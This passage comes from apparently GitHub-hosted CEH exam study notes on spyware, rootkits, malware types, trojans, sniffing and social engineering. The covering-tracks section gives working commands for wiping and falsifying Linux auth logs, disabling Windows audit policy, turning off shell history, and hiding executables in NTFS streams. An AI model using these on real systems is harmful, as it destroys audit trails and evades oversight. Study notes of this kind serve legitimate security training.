keylogger** 343 | - PC/BIOS embedded 344 | - Keyboard 345 | - External device 346 | - PS/2 and USB 347 | - Acoustic/CAM 348 | - Bluetooth 349 | - Wi-Fi 350 | - **Hardware Keylogger Tools:** 351 | - KeyGrabber - electronic device capable of caputring keystrokes from PS/2 USB keyboard. 352 | 353 | - **Software keylogger** 354 | - Application 355 | - Kernel 356 | - Hypervisor-based 357 | - Form Grabbing based (records 358 | from web form data) 359 | - **Software Keylogger Tools:** 360 | - KeyCarbon 361 | - Keyllama Keylloger 362 | - Keyboard logger 363 | - KeyGhost 364 | 365 | 366 | 367 | ### **Spywares** - watching user's action and logging them without the user's knowledege. 368 | - Hide its process, files and other objects 369 | - **Spywares can teals user's PII, monitors activity, display annoying pop-ups, redirect web pages to ads, changes the browser's settings, steal passwords, modifies the DLLs, changes firewall settings and so on**. 370 | - **Types of spyware:** 371 | - Desktop 372 | - Email 373 | - Internet 374 | - Child-Monitoring 375 | - Screen Capturing 376 | - USB 377 | - Audio and Video 378 | - Printers 379 | - Mobile devices / Telephones / Cellphones 380 | - GPS 381 | - **Spyware Tools**: 382 | - [SpyAgent](https://www.spytech-web.com/) - allows you to secretly monitor and record all activities on your computer, which is completely legal. 383 | - [Power Spy](http://ematrixsoft.com/power-spy-software.php) - allows you to secretly monitor and record all activities on your computer, which is completely legal. 384 | - **mSpy** - GPS spyware that trace the location of particular mobile devices. 385 | - **USBDeview** - monitors and analyzes data transferred between any USB device connected to a computer. 386 | 387 | ### Defending against Keyloggers and Spywares 388 | - Restrict physical access to computer systems 389 | - Use anti-keylogger between the keyboard and its driver 390 | - Use pop-up blocker and avoid opening junk emails 391 | - Use anti-spyware/antivirus 392 | - Firewall and anti-keylogging software(Zemana AntiLogger) 393 | - Update and patch! 394 | - Recognize phishing emails 395 | - Host-based IDS 396 | - Automatic form-filling password manager or virtual keyboard 397 | 398 | ## Hiding Files 399 | 400 | > ⚡︎ **Check out the practical labs(2) on [Hiding Files using NTFS streams](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/8-NTFS-Streams.md) and [Steganography](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/9-Steganography.md)** 401 | 402 | - In Windows, you can use **Alternate Data Stream** (ADS) to hide files: 403 | - Hides a file from directory listing on an NTFS file system 404 | - `type badfile.exe: > plaintext.txt:badfile.exe` 405 | - Next create a symlink `mklink normalApp.exe readme.txt:badfile.exe`) 406 | - You can also clear out all ADS by copying files to a FAT partition 407 | - To show ADS, `dir /r` does the trick; 408 | - You can use `streams` from **Sysinternals** to show streams. 409 | - Also you can use **FTK (Forensics ToolKit)** to look for this 410 | - **You can also hide files by attributes** 411 | - In Windows: `attrib +h filename` 412 | - In Linux, simply add a `.` to the beginning of the filename (`.file.tar`) 413 | - **Can hide data and files with steganography** 414 | - Tools for steganography: 415 | - CLI (Linux): 416 | - **`steghide`** 417 | - GUI (Windows): 418 | - **Snow** 419 | - **OpenStego** 420 | - **OpenPuff** 421 | 422 | > ### ⚠️ Steganography: 423 | 424 | - **Steganography** - practice of concealing a message inside another medium so that only the sender and recipient know of its existence 425 | - **Ways to Identify** 426 | - Text - character positions are key - blank spaces, text patterns 427 | - Image - file larger in size; some may have color palette faults 428 | - Audio & Video - require statistical analysis 429 | - **Methods** 430 | - Least significant bit insertion - changes least meaningful bit 431 | - Masking and filtering (grayscale images) - like watermarking 432 | - Algorithmic transformation - hides in mathematical functions used in image compression 433 | - **Tools** 434 | - QuickStego 435 | - gifshuffle 436 | - SNOW 437 | - Steganography Studio 438 | - OpenStego 439 | 440 | 441 | ## Rootkits 442 | 443 | - Software put in place by attacker to obscure system compromise 444 | - Hides processes and files 445 | - Also allows for future access 446 | - **Examples** 447 | - Horsepill - Linus kernel rootkit inside initrd 448 | - Grayfish - Windows rootkit that injects in boot record 449 | - Firefef - multi-component family of malware 450 | - Azazel 451 | - Avatar 452 | - Necurs 453 | - ZeroAccess 454 | - **Hypervisor level** - rootkits that modify the boot sequence of a host system to load a VM as the host OS 455 | - **Hardware** - hide malware in devices or firmware 456 | - **Boot loader level** - replace boot loader with one controlled by hacker 457 | - **Application level** - directed to replace valid application files with Trojans 458 | - **Kernel level** - attack boot sectors and kernel level replacing kernel code with back-door code; most dangerous 459 | - **Library level** - use system-level calls to hide themselves 460 | - One way to detect rootkits is to map all the files on a system and then boot a system from a clean CD version and compare the two file systems 461 | 462 | ## Covering Tracks 463 | 464 | **Clearing logs is the main idea behind covering tracks.** 465 | 1. Find and clear the logs. 466 | 2. Falsify/Modify logs. 467 | 468 | ### **On Linux:** 469 | - Linux keep the **command line history on `.bash_history`** file 470 | - To clear out the command line history use `rm -rf` to force remove. You also can use `shred -zu` that deletes the file and **overwrite on memory**. 471 | - You can also use `history -c` to clear all command line history on entire system or `history -w` to clear out all session history. 472 | 473 | - **Turn off the command logs:** 474 | - `export HISTSIZE=0` 475 | - `echo $HISTSIZE` will return 0 limiting the number of commands which can be saved in $HISTFILE. 476 | 477 | - **clearev** - Meterpreter shell command to clear log files (issued inside Metasploit Framework) 478 | 479 | **Most common logs on Linux:** 480 | 481 | - `/var/log/messages` or `/var/log/syslog/` 482 | - General messages, as well as system-related information. 483 | - `/var/log/auth.log` or `/var/log/secure` 484 | - Store authentication logs, including both successful and failed logins and authentication methods. 485 | - `/var/log/boot.log` 486 | - Related to booting and any messages logged during startup. 487 | - `/var/log/maillog` or `var/log/mail.log` 488 | - stores all logs related to mail servers. 489 | - **Clearing and Modifying logs on Linux**: 490 | - It is possible to echo whitespace to clear the event log file: 491 | - `echo " " > /var/log/auth.log` 492 | - Also you can perform this by using 'black hole dev/null': 493 | - `echo /dev/null > auth.log` 494 | - To tamper/modify the log files, you can use `sed` stream editor to delete, replace and insert data. 495 | - `sed -i '/opened/d' /var/log/auth.log` - this command will delete every line that contains the '**opened**' word, that refers to opened sessions on Linux system. 496 | 497 | ### **On Windows:** 498 | - To clear out all **command line history**: 499 | - On **Cmd Prompt**: press [`alt`] + [`F7`] 500 | - On **PowerShell**: type `Clear-History` 501 | 502 | In Windows, you need to clear **application**, **system** and **security logs**. 503 | 504 | - **Auditpol** for changing settings on log files (used for manipulate audit policies). 505 | - Main commands: 506 | - `auditpol /get /category:*` --> display all audit policies in detail if is enable *(Object Acces, System, Logon/Logoff, Privilege Use, and so on).* 507 | - `auditpol /clear` --> reset (disable) the system audit policy for all subcategories. 508 | - `auditpol /remove` --> Removes all per-user audit policy settings and disables all system audit policy settings. 509 | 510 | > ⚡︎ **Check out the [practical lab on Auditpol](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/5-System-Hacking/11-Auditpol.md)** 511 | - **MRU** (Most Recently Used) programs that registry recenlty used programs/files and saves on Windows Registry. 512 | 513 | - **Is possible to manually clear the logs on Event Viewer**. 514 | 515 | ### Conclusion on Covering Tracks 516 | 517 | - Option is to corrupt a log file - this happens all the time 518 | - Best option is be selective and delete the entries pertaining to your actions. 519 | 520 | - **Can also disable auditing ahead of time to prevent logs from being captured** 521 | 522 | - Tools: 523 | - ccleaner --> automate the system cleaning, scrub online history, log files, etc. [Windows] 524 | - MRUblaster [Windows] 525 | - Meterpreter on MSF have **clearev** to clear all event logs remotely. [Kali Linux using MSF] 526 | -------------------------------------------------------------------------------- /7-Malware.md: -------------------------------------------------------------------------------- 1 | # Malwares 2 | 3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/6-Malware)** 4 | 5 | ### - **What is Malware?** 6 | *Any software intentionally designed to cause damage to a computer, server or computer network. The code is described as computer viruses, worms, Trojan horses, ransomware, spyware, adware, and scareware, among other terms. Malware has a malicious intent, acting against the interest of the computer user.* 7 | 8 | ## Types of Viruses and Worms 🐛 9 | * **How it works?** 10 | 1. Infection Phase - a virus planted on a target system and replicates itself and attaches to one or more executable files 11 | 2. Attack phase - the infected file is executed accidentally by the user, or in some way is deployed and activated 12 | 13 | - **Virus** - Designed to spread from host to host and has the ability to replicate itself. They cannot reproduce/spread without help. They operate by inserting or attaching itself to a legitimate program or document in order to execute its code. 14 | 15 | - **Macro Virus** - Written in a macro language (e.g: VBA) and that is platform independent. 16 | 17 | - **Compression Viruses** - Another type of virus that appends itself to executables on the system and compresses them by user's permissions. 18 | 19 | - **Stealth Virus** - Hides the modifications it has made; Trick antivirus software; intercepting its requests to the OS and provides false and bogus information. 20 | 21 | - **Polymorphic Virus** - Produces varied but operational copies of itself. A polymorphic virus may have no parts that remain identifcal between infections, making it very hard to detect using signatures. 22 | 23 | - **Multipart Virus** - Attempts to infect both boot sector and files; generally refers to viruses with multiple infection methods 24 | 25 | - **Self-garbling (metamorphic) virus** - Rewrites itself every time it infects a new file. 26 | 27 | - **Other Virus Types** 28 | - **Boot Sector Virus** - known as system virus; moves boot sector to another location and then inserts its code int he original location 29 | - **Shell Virus** - wraps around an application's code, inserting itself before the application's 30 | - **Cluster Virus** - modifies directory table entries so every time a file or folder is opened, the virus runs 31 | - **Encryption Virus** - uses encryption to hide the code from antivirus 32 | - **Cavity Virus** - overwrite portions of host files as to not increase the actual size of the file; uses null content sections 33 | - **Sparse Infector Virus** - only infects occasionally (e.g. every 10th time) 34 | - **File Extension Virus** - changes the file extensions of files to take advantage of most people having them turned off (readme.txt.vbs shows as readme.txt) 35 | 36 | - **Virus Makers** 37 | - Sonic Bat 38 | - PoisonVirus Maker 39 | - Sam's Virus Generator 40 | - JPS Virus Maker 41 | 42 | - **Worm** - self-replicating malware that sends itself to other computers without human intervention 43 | - Usually doesn't infect files - just resides in active memory 44 | - Often used in botnets 45 | 46 | - **Ghost Eye Worm** - hacking tool that uses random messaging on Facebook and other sites to perform a host of malicious efforts. 47 | 48 | - **Logic Bomb** - Executes a program when a certain event happens or a date and time arrives. 49 | 50 | - **Rootkit** - Set of malicious tools that are loaded on a compromised system through stealthy techniques; Very hard to detect; 51 | 52 | - **Ransomware** - malicious software designed to deny access to a computer until a price is paid; usually spread through email 53 | - **WannaCry** - famous ransomware; within 24 hours had 230,000 victims; exploited unpatched SMB vulnerability 54 | - **Other Examples** 55 | - Cryptorbit 56 | - CryptoLocker 57 | - CryptoDefense 58 | - police-themed 59 | 60 | - **Trojan horse** - A program that is disguised as another legitimate program with the goal of carrying out malicious activities in the background without user's knowledge. 61 | - **RAT - Remote Access Trojans** - Malicious programs that run on systems and allow intruders to access and use a system remotely. 62 | 63 | - **Immunizer** - Attaches code to a file or application, which would fool a virus into 'thinking' it was already infected. (e.g: like human vaccine). 64 | 65 | - **Behavior blocking** - Allowing the suspicious code to execute within the OS and watches its interactions looking for suspicious activities. 66 | 67 | > **️⚠️ - Viruses needs help/interaction to propagate; Worms self propagates** 68 | 69 | ### Major characteristics of viruses: 70 | 1. Infecting other files 71 | 2. Alteration of data 72 | 3. Transforms itself 73 | 4. Corruption of files and data 74 | 5. Encrypts itself 75 | 6. Self-replication 76 | 77 | ### Stages of Virus Lifecycle: 78 | 1. Design 79 | 2. Replication 80 | 3. Launch 81 | 4. Detection 82 | 5. Incorporation - A.V. figures out the virus pattern & builds signatures to identify and eliminate the virus 83 | 6. Execution of the damage routine - A.V. to the rescue 84 | 85 | ## Malware Basics 86 | * **How is malware distributed?** 87 | - SEO manipulation 88 | - Social Engineering / Click-jacking 89 | - Phishing 90 | - Malvertising 91 | - Compromising legitimate sites 92 | - Drive-by downloads 93 | - Spam 94 | 95 | - **Malware** - software designed to harm or secretly access a computer system without informed consent 96 | - Most is downloaded from the Internet with or without the user's knowledge 97 | 98 | - **Overt Channels** - legitimate communication channels used by programs 99 | 100 | - **Covert Channels** - used to transport data in unintended ways 101 | 102 | - **Wrappers** - programs that allow you to bind an executable to an innocent file 103 | 104 | ### **Basic components of Malware** 105 | 1. **Crypters** - use a combination of encryption and code manipulation to render malware undetectable to security programs; protects from being scanned or found during analysis. 106 | 107 | 2. **Downloader** - Used to download additional malware. 108 | 109 | 3. **Dropper** - Used to install additional malware into the target system. 110 | 111 | 4. **Exploit** - Malicious code used to execute on a specific vulnerability. 112 | 113 | 5. **Injector** - Used to expose vulnerable processes in the target system to the exploit. 114 | 115 | 6. **Obfuscator** - Used to conceal the true purpose of the malware. 116 | 117 | 7. **Packers** - Used to bundle all of the malware files together into a single executable. 118 | 119 | 8. **Payload** - Used to take over the target machine. 120 | 121 | 9. **Malicious Code** - Used to define the abilities of the malware. 122 | 123 | **Exploit Kits** - help deliver exploits and payloads 124 | - Infinity 125 | - Bleeding Life 126 | - Crimepack 127 | - Blackhole Exploit Kit 128 | 129 | ## Trojans 🐴 130 | 131 | - Software that appears to perform a desirable function but instead performs malicious activity 132 | - To hackers, it is a method to gain and maintain access to a system 133 | - Trojans are means of delivery whereas a backdoor provides the open access 134 | - Trojans are typically spread through **Social Engineering**. 135 | 136 | - **Types of Trojans:** 137 | - **Defacement trojan** 138 | - **Proxy server trojan** 139 | - **Botnet trojan** 140 | - Chewbacca 141 | - Skynet 142 | - **Remote access trojans** 143 | - RAT 144 | - MoSucker 145 | - Optix Pro 146 | - Blackhole 147 | - **E-banking trojans** 148 | - Zeus 149 | - Spyeye 150 | - **IoT Trojans** 151 | - **Security Software Disable Trojans** 152 | - **Command Shell Trojan** - Provides a backdoor to connect to through command-line access 153 | - Netcat 154 | - **Covert Channel Tunneling Trojan** (CCTT) - a RAT trojan; creates data transfer channels in previously authorized data streams 155 | 156 | ### Infection Process: 157 | 1. Creation of a Trojan using Trojan Construction Kit 158 | 2. Create a Dropper 159 | - Used to install additional malware into the target system. 160 | 3. Create a Wrapper 161 | - Wrappers - programs that allow you to bind an executable to an innocent file 162 | 4. Propagate the Trojan 163 | 5. Execute the Dropper 164 | 165 | ### **Trojan Port Numbers**: 166 | 167 | | Trojan Name | TCP Port | 168 | |--------------------|--------| 169 | | Death | 2 | 170 | | Senna Spy | 20 | 171 | | Blade Runner, Doly Trojan, Fore, Invisble FTP, WebEx, WinCrash | 21 | 172 | | Shaft | 22| 173 | | Executor | 80 | 174 | | Hackers Paradise | 31,456 | 175 | | TCP Wrappers | 421 | 176 | | Ini-Killer | 555 | 177 | | Doom, Santaz Back | 666 | 178 | | Silencer, WebEx | 1001 | 179 | | DolyTrojan | 1011 | 180 | | RAT | 1095-98| 181 | | SubSeven | 1243 | 182 | | Shiva-Burka | 1600 | 183 | | Trojan Cow | 2001 | 184 | | Deep Throat | 6670-71| 185 | | Tini | 7777 | 186 | | Dumaru.Y | 10000 | 187 | | SubSeven 1.0-1.8, MyDoom.B | 10080 188 | | VooDoo Doll, NetBus 1.x, GabanBus, Pie Bill Gates, X-Bill | 12345 189 | | Whack a Mole | 12361-3| 190 | | NetBus | 17300 | 191 | | Back Orifice | 31337,8| 192 | | SubSeven, PhatBot, AgoBot, Gaobot | 65506 | 193 | 194 | > **⚠️ - Its not necessary to know every possible trojan port in the history for the CEH exam, it's good for understanding.** 195 | 196 | ### **Trojan Countermeasures** 197 | 1. Avoid cicking on unusual or suspect email attachments 198 | 2. Block unused ports 199 | 3. Monitor network traffic 200 | 4. Avoid downloading from unstrusted sources 201 | 5. Install & updated anti-virus software 202 | 6. Scan removable media before use 203 | 7. Validate file integrity of all externally sourced software 204 | 8. Enable auditing 205 | 9. Configure Host-Based firewalls 206 | 10. Use IDS 207 | 208 | ### Techniques 209 | - **`netstat -an`** - shows open ports in numerical order 210 | - **`netstat -b`** - displays all active connections and the processes using them 211 | - **Process Explorer** - Microsoft tool that shows you everything about running processes 212 | - **Registry Monitoring Tools** 213 | - SysAnalyzer 214 | - Tiny Watcher 215 | - Active Registry Monitor 216 | - Regshot 217 | - **Msconfig** - Windows program that shows all programs set to start on startup 218 | - **Tripwire** - integrity verifier that can act as a HIDS in protection against trojans 219 | - **SIGVERIF** - build into Windows to verify the integrity of the system 220 | - Log file can be found at `c:\windows\system32\sigverif.txt` 221 | - Look for drivers that are not signed 222 | 223 | ## Malware Analysis 224 | *Malware analysis is the study or process of determining the functionality, origin and potential impact of a given malware sample such as a virus, worm, trojan horse, rootkit, or backdoor.* 225 | ### **Types of Malware analysis:** 226 | 1. **Static (Code Analysis)** - performed by fragmenting the binary file into individual elements that can be analyzed without executing them. 227 | - File fingerprinting 228 | - Local & online scanning of elements to see if they match known malware profiles 229 | - String searching 230 | - Identifying packers/obfuscators used 231 | - Identifying the PE's (portable executable) information 232 | - Identify dependencies 233 | - Malware disassembly 234 | 235 | 2. **Dynamic (Behavioral Analysis)** - performed by executing the malware to see what effect it has on the system. 236 | - System baselining 237 | - Host integrity monitoring 238 | - **Tools for Disassembling | Debugging | Reverse Engineering:** 239 | - IDA Pro 240 | - OllyDdg 241 | - Ghidra by NSA 242 | 243 | - **Sheepdip** - Dedicated computer which is used to test files on removable media for viruses before they are allowed to be used with other computers. 244 | 245 | ### **Steps** 246 | 1. Make sure you have a good test bed 247 | - Use a VM with NIC in host-only mode and no open shares 248 | 2. Analyze the malware on the isolated VM in a static state 249 | - Tools - binText and UPX help with looking at binary 250 | 3. Run the malware and check out processes 251 | - Use Process Monitor, etc. to look at processes 252 | - Use NetResident, TCPview or even Wireshark to look at network activity 253 | 4. Check and see what files were added, changed, or deleted 254 | - Tools - IDA Pro, VirusTotal, Anubis, Threat Analyzer 255 | 256 | - **Preventing Malware** 257 | - Make sure you know what is going on in your system 258 | - Have a good antivirus that is up to date 259 | - Airgapped - isolated on network 260 | 261 | 262 | ## Rootkits 263 | 264 | - Software put in place by attacker to obscure system compromise 265 | - Hides processes and files 266 | - Also allows for future access 267 | - **Examples** 268 | - Horsepill - Linus kernel rootkit inside initrd 269 | - Grayfish - Windows rootkit that injects in boot record 270 | - Firefef - multi-component family of malware 271 | - Azazel 272 | - Avatar 273 | - Necurs 274 | - ZeroAccess 275 | - **Hypervisor level** - rootkits that modify the boot sequence of a host system to load a VM as the host OS 276 | - **Hardware** - hide malware in devices or firmware 277 | - **Boot loader level** - replace boot loader with one controlled by hacker 278 | - **Application level** - directed to replace valid application files with Trojans 279 | - **Kernel level** - attack boot sectors and kernel level replacing kernel code with back-door code; most dangerous 280 | - **Library level** - use system-level calls to hide themselves 281 | - One way to detect rootkits is to map all the files on a system and then boot a system from a clean CD version and compare the two file systems 282 | -------------------------------------------------------------------------------- /8-Sniffing.md: -------------------------------------------------------------------------------- 1 | # Sniffing 2 | 3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/7-Sniffing)** 4 | 5 | *Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools. It is a form of “tapping phone wires” and get to know about the conversation. It is also called wiretapping applied to the computer networks.* 6 | 7 | ## Active and Passive Sniffing 8 | 9 | - **Passive sniffing** - watching network traffic without interaction; only works for same collision domain 10 | - **Active sniffing** - uses methods to make a switch send traffic to you even though it isn't destined for your machine 11 | - **Span port** - switch configuration that makes the switch send a copy of all frames from other ports to a specific port 12 | - Not all switches have the ability to do this 13 | - Modern switches sometimes don't allow span ports to send data - you can only listen 14 | - **Network tap** - special port on a switch that allows the connected device to see all traffic 15 | - ![net-tap](https://i1.wp.com/ipwithease.com/wp-content/uploads/2014/06/NETWORK-TAP.jpg?resize=768%2C429&ssl=1) 16 | - **Port mirroring** - another word for span port 17 | 18 | ## Basics 19 | 20 | - Sniffing is capturing packets as they pass on the wire to review for interesting information 21 | - **MAC** (Media Access Control) - physical or burned-in address - assigned to NIC for communications at the Data Link layer 22 | - 48 bits long 23 | - Displayed as 12 hex characters separated by colons 24 | - First half of address is the **organizationally unique identifier** - identifies manufacturer 25 | - Second half ensures no two cards on a subnet will have the same address 26 | - NICs normally only process signals meant for it 27 | - **Promiscuous mode** - NIC must be in this setting to look at all frames passing on the wire 28 | - **CSMA/CD** - Carrier Sense Multiple Access/Collision Detection - used over Ethernet to decide who can talk 29 | - **Collision Domains** 30 | - Traffic from your NIC (regardless of mode) can only be seen within the same collision domain 31 | - Hubs by default have one collision domain 32 | - Switches have a collision domain for each port 33 | 34 | ## Protocols Susceptible 35 | *Some of the protocols that are vulnerable to sniffing attacks.* 36 | 37 | - **IMAP**, **POP3**, **NNTP** and **HTTP** all send over clear text data 38 | 39 | - **SMTP** is sent in plain text and is viewable over the wire. SMTP v3 limits the information you can get, but you can still see it. 40 | 41 | - **FTP** sends user ID and password in clear text 42 | 43 | - **TFTP** passes everything in clear text 44 | 45 | - **TCP** shows sequence numbers (usable in session hijacking) 46 | 47 | - **TCP** and **UCP** show open ports 48 | 49 | - **IP** shows source and destination addresses 50 | 51 | 52 | ## ARP 53 | 54 | - Stands for Address Resolution Protocol 55 | - Resolves IP address to a MAC address 56 | - Packets are ARP_REQUEST and ARP_REPLY 57 | - Each computer maintains it's own ARP cache, which can be poisoned 58 | - **Commands** 59 | - **`arp -a`** displays current ARP cache 60 | - **`arp -d *`** clears ARP cache 61 | - Works on a broadcast basis - both requests and replies are broadcast to everyone 62 | - **Gratuitous ARP** - special packet to update ARP cache even without a request 63 | - This is used to poison cache on other machines 64 | 65 | ## IPv6 66 | 67 | - Uses 128-bit address 68 | - Has eight groups of four hexadecimal digits 69 | - Sections with all 0s can be shorted to nothing (just has start and end colons) 70 | - Double colon can only be used once 71 | - Loopback address is ::1 72 | 73 | | IPv6 Address Type | Description | 74 | | ----------------- | ----------------------------------------------------- | 75 | | Unicast | Addressed and intended for one host interface | 76 | | Multicast | Addressed for multiple host interfaces | 77 | | Anycast | Large number of hosts can receive; nearest host opens | 78 | 79 | | IPv6 Scopes | Description | 80 | | ----------- | ------------------------------------------------------------ | 81 | | Link local | Applies only to hosts on the same subnet (Address block fe80::/10) | 82 | | Site local | Applies to hosts within the same organization (Address block FEC0::/10) | 83 | | Global | Includes everything | 84 | 85 | - Scope applies for multicast and anycast 86 | - Traditional network scanning is **computationally less feasible** 87 | 88 | ## Wiretapping 89 | *Wiretapping, also known as telephone tapping, is the process of monitoring telephone and Internet conversations by a third party, often by covert means.* 90 | 91 | - **Lawful interception** - Legally intercepting communications between two parties 92 | - **Active** - Interjecting something into the communication 93 | - **Passive** - Only monitors and records the data 94 | - **PRISM** - System used by NSA to wiretap external data coming into US 95 | 96 | 97 | ## MAC Flooding 98 | 99 | - Switches either flood or forward data 100 | - If a switch doesn't know what MAC address is on a port, it will flood the data until it finds out 101 | - **CAM Table** - the table on a switch that stores which MAC address is on which port 102 | - If table is empty or full, everything is sent to all ports 103 | 104 | - MAC Flooding will often destroy the switch before you get anything useful, doesn't last long and it will get you noticed. Also, most modern switches protect against this. 105 | 106 | - **CAM Table Overflow Attack** - Occurs when an attacker connects to a single or multiple switch ports and then runs a tool that mimics the existence of thousands of random MAC addresses on those switch ports. The switch enters these into the CAM table, and eventually the CAM table fills to capacity. *(This works by sending so many MAC addresses to the CAM table that it can't keep up).* **This attack can be performed by using macof.** 107 |
108 | - ![macof](https://i0.wp.com/kalilinuxtutorials.com/wp-content/uploads/2015/09/macof2.png) 109 | 110 | 111 | - **Tools for MAC flooding** 112 | - Etherflood 113 | - Macof 114 | - Dsniff 115 | 116 | ## Switch port stealing 117 | Tries to update information regarding a specific port in a race condition 118 | 1. ARP Flood 119 | - Source MAC address same a victim 120 | - Destination MAC is attacker's 121 | - CAM updates port info (stolen) 122 | 2. Attacker now intercepts victim traffic 123 | 3. Attacker stops flooding 124 | 4. Victim reclaims port 125 | 5. Attacker retransmits captured data 126 | 6. Attacker repeats flooding 127 | 128 | ## ARP Poisoning 129 | ![arp](https://upload.wikimedia.org/wikipedia/commons/thumb/3/33/ARP_Spoofing.svg/1200px-ARP_Spoofing.svg.png) 130 | ***ARP spoofing** is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network.* 131 | 132 | - **Also called ARP spoofing or gratuitous ARP** 133 | - This can trigger alerts because of the constant need to keep updating the ARP cache of machines 134 | - Changes the cache of machines so that packets are sent to you instead of the intended target 135 | - **Countermeasures** 136 | - Dynamic ARP Inspection using DHCP snooping 137 | - Can use Static ARP ACL to map 138 | - Header to Payload validation 139 | - XArp software can also watch for this 140 | - Default gateway MAC can also be added permanently into each machine's cache 141 | - **Tools for ARP Poisoning** 142 | - Cain and Abel 143 | - WinArpAttacker 144 | - Ufasoft 145 | - dsniff 146 | 147 | ## DHCP Starvation 148 | *Is an attack that targets DHCP servers whereby forged DHCP requests are crafted by an attacker with the intent of exhausting all available IP addresses that can be allocated by the DHCP server.* 149 | 150 | - Attempt to exhaust all available addresses from the server 151 | - Attacker sends so many requests that the address space allocated is exhausted 152 | - DHCPv4 packets - `DHCPDISCOVER`, `DHCPOFFER`, `DHCPREQUEST`, `DHCPACK` 153 | - DHCPv6 packets - Solicit, Advertise, Request (Confirm/Renew), Reply 154 | - **DHCP Steps** 155 | 1. Client sends `DHCPDISCOVER` 156 | 2. Server responds with `DHCPOFFER` 157 | 3. Client sends request for IP with `DHCPREQUEST` 158 | 4. Server sends address and config via `DHCPACK` 159 | - **Tools** 160 | - Yersinia 161 | - DHCPstarv 162 | - Mitigation is to configure DHCP snooping 163 | - **Rogue DHCP Server** - setup to offer addresses instead of real server. Can be combined with starvation to real server. 164 | 165 | ## Spoofing 166 | 167 | - **MAC Spoofing** - Changes your MAC address. Benefit is CAM table uses most recent address. 168 | - Port security can slow this down, but doesn't always stop it. 169 | - MAC Spoofing makes the switch send all packets to your address instead of the intended one until the CAM table is updated with the real address again. 170 | 171 | - **IRDP Spoofing** - Attacker sends ICMP Router Discovery Protocol messages advertising a malicious gateway. 172 | 173 | - **DNS Poisoning** - Changes where machines get their DNS info from, allowing attacker to redirect to malicious websites. 174 | 175 | ## Sniffing Tools 176 | 177 | ### **Wireshark** 178 | *Wireshark is the world’s foremost and widely-used network protocol analyzer. It lets you see what’s happening on your network at a microscopic level.* 179 | - With Wirehsark you can inspect and detect ARP poisonings, Rogue DHCP servers, Broadcast Storm etc. 180 | 181 | - ![ws](https://camo.githubusercontent.com/9a68907d89fefb9c1bcc0eae0c25c154c6868f62/68747470733a2f2f75706c6f61642e77696b696d656469612e6f72672f77696b6970656469612f636f6d6d6f6e732f302f30332f57697265736861726b5f73637265656e73686f742e706e67) 182 | - Previously known as Ethereal 183 | - Can be used to follow streams of data 184 | - Can also filter the packets so you can find a specific type or specific source address 185 | 186 | - **Wireshark filters**: 187 | - **`!(arp or icmp or dns)`** 188 | - Filters out the "noise" from ARP, DNS and ICMP requests 189 | - **!** - Clears out the protocols for better inspection 190 | - **`tcp.port == 23`** 191 | - Look for **specific ports** using tcp.port 192 | - **`ip.addr == 10.0.0.165`** 193 | - Look for specific **IP address** 194 | - **`ip.addr == 172.17.15.12 && tcp.port == 23`** 195 | - Displays telnet packets containing that IP 196 | - **`ip.src == 10.0.0.224 && ip.dst == 10.0.0.156`** 197 | - See all packets exchanged from IP source to destination IP 198 | - **`http.request`** 199 | - Displays HTTP GET requests 200 | - **`tcp contains string`** 201 | - Displays TCP segments that contain the word "string" 202 | - **`tcp.flags==0x16`** 203 | - Filters TCP requests with ACK flag set 204 | 205 | ### **tcpdump** 206 | *Tcpdump is a data-network packet analyzer computer program that runs under a command line interface. It allows the user to display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.* 207 | - ![tcpdump](https://camo.githubusercontent.com/33a479b12001431323304fb8a5f75ea65444357f/68747470733a2f2f7061636b6574666c6f77732e636f6d2f77702d636f6e74656e742f75706c6f6164732f323031372f30352f74637064756d705f692e706e67) 208 | - **Syntax** 209 | - <**tcpdump flag(s) interface**> 210 | - `tcpdump -i eth1` 211 | - Puts the interface in listening mode 212 | - WinDump is a Windows version similar to tcpdump. 213 | 214 | ### **tcptrace** 215 | - Analyzes files produced by packet capture programs such as Wireshark, tcpdump and Etherpeek 216 | 217 | ### **Other Tools** 218 | - **Ettercap** - also can be used for MITM attacks, ARP poisoning. Has active and passive sniffing. 219 | - **Capsa Network Analyzer** 220 | - **Snort** - usually discussed as an Intrusion Detection application 221 | - **Sniff-O-Matic** 222 | - **EtherPeek** 223 | - **WinDump** 224 | - **WinSniffer** 225 | 226 | ## **Defending and Countermeasures techniques against Sniffing**: 227 | - Disable ARP Dynamic 228 | - ARP Spoofing detection tools 229 | - Encrypt all the traffic that leaves your system 230 | - Avoid public Wi-Fi spots 231 | - Network scanning and monitoring 232 | - Reverse DNS lookup's on logs == Sniffer 233 | - **Ping** suspect clients with **wrong MAC address** 234 | - If suspect accepts the packet, is a good indication that he is sniffing the network / using NIC in promiscuous mode. 235 | - Use **Nmap** with nse-script for **Sniffer Detect**: 236 | - **`nmap --script=sniffer-detect `** 237 | 238 | 239 | 240 | 241 | -------------------------------------------------------------------------------- /9-Social-Engineering.md: -------------------------------------------------------------------------------- 1 | # Social Engineering 2 | 3 | > ⚡︎ **This chapter has [practical labs](https://github.com/Samsar4/Ethical-Hacking-Labs/tree/master/8-Social-Engineering)** 4 | 5 | *Social Engineering is the art of manipulating a person or group into providing information or a service they would otherwise not have given.* 6 | 7 | ## Phases 8 | 1. 🔍 **Research target company** 9 | - Dumpster dive, visit websites, tour the company, etc 10 | 2. 🎯 **Select the victim** 11 | - Identify frustrated employee or other target 12 | 3. 💬 **Build a relationship** 13 | - Develop relationship with target employee 14 | 4. 💰 **Exploit the relationship** 15 | - Collect sensitive information and current technologies 16 | 17 | ## Principles 18 | 1. **Authority** 19 | * Impersonate or imply a position of authority 20 | 2. **Intimidation** 21 | * Frighten by threat 22 | 3. **Consensus / Social proof** 23 | * To convince of a general group agreement 24 | 4. **Scarcity** 25 | * The situation will not be this way for long 26 | 5. **Urgency** 27 | * Works alongside scarcity / act quickly, don't think 28 | 6. **Familiarity** 29 | * To imply a closer relationship 30 | 7. **Trust** 31 | * To assure reliance on their honesty and 